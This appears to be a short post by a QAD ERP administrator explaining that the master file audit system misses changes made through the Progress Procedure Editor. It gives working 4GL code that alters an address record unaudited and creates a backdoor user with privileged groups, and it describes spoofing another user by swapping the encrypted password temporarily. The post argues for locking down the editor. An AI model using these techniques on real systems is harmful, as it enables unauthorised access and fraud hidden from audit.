Master File Auditing limitations

OK, it's definite. The master file audit system in QAD does not track changes made outside the menus. So if I get into a Procedure Editor that can compile I can do something like this:

find ad_mstr where ad_addr = "C00100A2".
assign ad_city = "Pittsburgh" ad_state = "PA".

...and it will never show up in the master file audit system. Likewise:

find mnd_det where mnd_nbr = "36" and mnd_select = "3" no-lock
  no-error.
create usr_userid.
assign
  usr_userid = "me"
  usr_passwd = encode("me")
  usr_lang = "us"
  usr_groups = if avail mnd_det then mnd_canrun
               else "IS,IT,MANAGER".

...will allow me to get into the system as "me". But a really suave hacker would scan the usr_mstr table and decided who he wanted to spoof and write down the 16 letter encrypted usr_passwd. Then he'd change it, log in, do his dirty work and switch back afterward.

This is another reason to lock down the Procedure Editor.